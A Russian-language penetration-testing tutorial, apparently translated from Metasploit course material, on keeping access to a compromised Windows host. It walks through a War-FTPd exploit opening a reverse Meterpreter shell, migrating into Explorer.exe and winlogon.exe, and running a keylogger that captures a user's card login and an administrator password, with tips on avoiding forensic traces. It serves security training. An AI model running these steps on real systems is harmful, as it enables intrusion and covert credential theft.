Сохранение доступа.

После успешной компрометации системы, пока доступ открыт, хорошей идеей будет иметь запасной вариант и убедиться, что вы не потеряете этот доступ, и в преть можете спокойно исследовать как этот хост, так и подстеть к которому он принадлежит. Это выход из ситуации когда эксплуатация уязвимости носит одноразовый характер, в таких случаях вы не сможете получить доступ к целевому хосту до его перезагрузки.

Как только вы получили доступ к одной системе, в конечном счете, вы можете получить доступ к системам, которые находятся в той же подсети. Плавно передвигаясь от одной системы к другой, получать информацию о пользователях и их деятельности путем отслеживания нажатий клавиш этими пользователями, а затем выдать себя за реального пользователя путем предоставления захваченных аутентификационных данных. Существует несколько методик о которых мы расскажем далее.

Перехват нажатия клавиш.

После того, как вы успешно «проэксплуатировали» систему, существует два различных подхода дальнейших действий, вы можете уничтожить систему или получить больше информации, используя вариант более медленный и тщательный.
Медленный и тщательный вариант обычно приводит к значительному объему информации, но при должном терпении и дисциплине с вашей стороны. Одним из инструментов, который можно использовать при медленном и тщательном сборе информации — скрипт регистрации нажатия клавиш в Meterpreter. Этот инструмент очень хорош в работе и позволяет перехватывать нажатия клавиш в системы без записи перехваченной информации на диск, оставляя минимум следов в системе для возможного дальнейшего анализа компьютерной экспертизой. Инструмент идеально подходит для получения паролей учетных записей пользователей, и всякой другой ценной информации.
Давайте взглянем на него в действии. Во-первых проэксплуатируем систему в нормальном режиме.

msf exploit(warftpd_165_user) > exploit
 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 172.16.104.145:21...
[*] Connected to target FTP server.
[*] Trying target Windows 2000 SP0-SP4 English...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 4 opened (172.16.104.130:4444 -> 172.16.104.145:1246)
 
meterpreter >

Затем произведем миграцию с процесса Meterpreter на Explorer.exe, чтобы не беспокоится о потери соединения путем сброса и закрытия нашей сессии експлуатируемым процессом.

meterpreter > ps
 
Process list
============
 
    PID   Name               Path                                                    
    ---   ----               ----                                                    
    140   smss.exe           \SystemRoot\System32\smss.exe                           
    188   winlogon.exe       ??\C:\WINNT\system32\winlogon.exe                      
    216   services.exe       C:\WINNT\system32\services.exe                          
    228   lsass.exe          C:\WINNT\system32\lsass.exe                             
    380   svchost.exe        C:\WINNT\system32\svchost.exe                           
    408   spoolsv.exe        C:\WINNT\system32\spoolsv.exe                           
    444   svchost.exe        C:\WINNT\System32\svchost.exe                           
    480   regsvc.exe         C:\WINNT\system32\regsvc.exe                            
    500   MSTask.exe         C:\WINNT\system32\MSTask.exe                            
    528   VMwareService.exe  C:\Program Files\VMwareVMware Tools\VMwareService.exe  
    588   WinMgmt.exe        C:\WINNT\System32\WBEMWinMgmt.exe                      
    664   notepad.exe        C:\WINNT\System32\notepad.exe                           
    724   cmd.exe            C:\WINNT\System32\cmd.exe                               
    768   Explorer.exe       C:\WINNT\Explorer.exe                                   
    800   war-ftpd.exe       C:\Program Files\War-ftpd\war-ftpd.exe                  
    888   VMwareTray.exe     C:\Program Files\VMware\VMware Tools\VMwareTray.exe     
    896   VMwareUser.exe     C:\Program Files\VMware\VMware Tools\VMwareUser.exe     
    940   firefox.exe        C:\Program Files\Mozilla Firefox\firefox.exe            
    972   TPAutoConnSvc.exe  C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe  
    1088  TPAutoConnect.exe  C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe  
 
meterpreter > migrate 768
[*] Migrating to 768...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 768

Финальным шагом мы запускаем кейлоггер, подождав немного, вы увидите в выводе информацию нажатых клавиш.

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
   tgoogle.cm my credit amex   myusernamthi     amexpasswordpassword

Все очень просто! Обратите внимание, как отображаются клавиши control и backspace.
В качестве дополнения, если вы хотите собрать системную информацию учетных данных на компьютере, нужно осуществить миграцию в процесс Winlogon. Это позволит захватить полномочия всех пользователей, входящих в систему.

meterpreter > ps
 
Process list
=================
 
PID Name         Path
--- ----         ----
401 winlogon.exe C:\WINNT\system32\winlogon.exe
 
meterpreter > migrate 401
 
[*] Migrating to 401...
[*] Migration completed successfully.
 
meterpreter > keyscan_start
Starting the keystroke sniffer...
 
**** A few minutes later after an admin logs in ****
 
meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator ohnoes1vebeenh4x0red!